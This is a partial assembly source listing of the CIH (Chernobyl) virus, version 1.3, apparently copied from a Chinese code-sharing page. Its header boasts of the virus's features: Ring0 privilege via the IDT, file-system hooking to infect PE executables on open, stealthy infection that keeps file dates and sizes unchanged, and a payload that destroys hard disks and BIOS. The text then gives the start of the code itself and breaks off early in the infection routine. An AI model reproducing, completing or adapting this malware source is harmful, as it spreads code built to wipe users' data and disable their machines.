📄 cih1.3.txt
字号:
; ****************************************************************************
; * The Virus Program Information *
; ****************************************************************************
; * *
; * Designer : CIH Original Place : TTIT of Taiwan *
; * Create Date : 04/26/1998 Now Version : 1.3 *
; * Modification Time : 05/24/1998 *
; * *
; *==========================================================================*
; * Modification History *
; *==========================================================================*
; * v1.0 1. Create the Virus Program. *
; * 2. The Virus Modifies IDT to Get Ring0 Privilege. *
; * 04/26/1998 3. Virus Code doesn't Reload into System. *
; * 4. Call IFSMgr_InstallFileSystemApiHook to Hook File System. *
; * 5. Modifies Entry Point of IFSMgr_InstallFileSystemApiHook. *
; * 6. When System Opens Existing PE File, the File will be *
; * Infected, and the File doesn't be Reinfected. *
; * 7. It is also Infected, even the File is Read-Only. *
; * 8. When the File is Infected, the Modification Date and Time *
; * of the File also don't be Changed. *
; * 9. When My Virus Uses IFSMgr_Ring0_FileIO, it will not Call *
; * Previous FileSystemApiHook, it will Call the Function *
; * that the IFS Manager Would Normally Call to Implement *
; * this Particular I/O Request. *
; * 10. The Virus Size is only 656 Bytes. *
; *==========================================================================*
; * v1.1 1. Especially, the File that be Infected will not Increase *
; * it's Size... ^__^ *
; * 05/15/1998 2. Hook and Modify Structured Exception Handing. *
; * When Exception Error Occurs, Our OS System should be in *
; * Windows NT. So My Cute Virus will not Continue to Run, *
; * it will Jmup to Original Application to Run. *
; * 3. Use Better Algorithm, Reduce Virus Code Size. *
; * 4. The Virus "Basic" Size is only 796 Bytes. *
; *==========================================================================*
; * v1.2 1. Kill All HardDisk, and BIOS... Super... Killer... *
; * 2. Modify the Bug of v1.1 *
; * 05/21/1998 3. The Virus "Basic" Size is 1003 Bytes. *
; *==========================================================================*
; * v1.3 1. Modify the Bug that WinZip Self-Extractor Occurs Error. *
; * So When Open WinZip Self-Extractor ==> Don't Infect it. *
; * 05/24/1998 2. The Virus "Basic" Size is 1010 Bytes. *
; ****************************************************************************
.586P
; ****************************************************************************
; * Original PE Executable File(Don't Modify this Section) *
; ****************************************************************************
OriginalAppEXE SEGMENT
FileHeader:
db 04dh, 05ah, 090h, 000h, 003h, 000h, 000h, 000h
db 004h, 000h, 000h, 000h, 0ffh, 0ffh, 000h, 000h
db 0b8h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 040h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 080h, 000h, 000h, 000h
db 00eh, 01fh, 0bah, 00eh, 000h, 0b4h, 009h, 0cdh
db 021h, 0b8h, 001h, 04ch, 0cdh, 021h, 054h, 068h
db 069h, 073h, 020h, 070h, 072h, 06fh, 067h, 072h
db 061h, 06dh, 020h, 063h, 061h, 06eh, 06eh, 06fh
db 074h, 020h, 062h, 065h, 020h, 072h, 075h, 06eh
db 020h, 069h, 06eh, 020h, 044h, 04fh, 053h, 020h
db 06dh, 06fh, 064h, 065h, 02eh, 00dh, 00dh, 00ah
db 024h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 050h, 045h, 000h, 000h, 04ch, 001h, 001h, 000h
db 0f1h, 068h, 020h, 035h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 0e0h, 000h, 00fh, 001h
db 00bh, 001h, 005h, 000h, 000h, 010h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 010h, 010h, 000h, 000h, 000h, 010h, 000h, 000h
db 000h, 020h, 000h, 000h, 000h, 000h, 040h, 000h
db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h
db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 020h, 000h, 000h, 000h, 002h, 000h, 000h
db 000h, 000h, 000h, 000h, 002h, 000h, 000h, 000h
db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 0c3h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
dd 00000000h, VirusSize
OriginalAppEXE ENDS
; ****************************************************************************
; * My Virus Game *
; ****************************************************************************
; *********************************************************
; * Constant Define *
; *********************************************************
TRUE = 1
FALSE = 0
DEBUG = TRUE
MajorVirusVersion = 1
MinorVirusVersion = 3
VirusVersion = MajorVirusVersion*10h+MinorVirusVersion
IF DEBUG
FirstKillHardDiskNumber = 81h
HookExceptionNumber = 05h
ELSE
FirstKillHardDiskNumber = 80h
HookExceptionNumber = 03h
ENDIF
FileNameBufferSize = 7fh
; *********************************************************
; *********************************************************
VirusGame SEGMENT
ASSUME CS:VirusGame, DS:VirusGame, SS:VirusGame
ASSUME ES:VirusGame, FS:VirusGame, GS:VirusGame
; *********************************************************
; * Ring3 Virus Game Initial Program *
; *********************************************************
MyVirusStart:
push ebp
; *************************************
; * Let's Modify Structured Exception *
; * Handing, Prevent Exception Error *
; * Occurrence, Especially in NT. *
; *************************************
lea eax, [esp-04h*2]
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -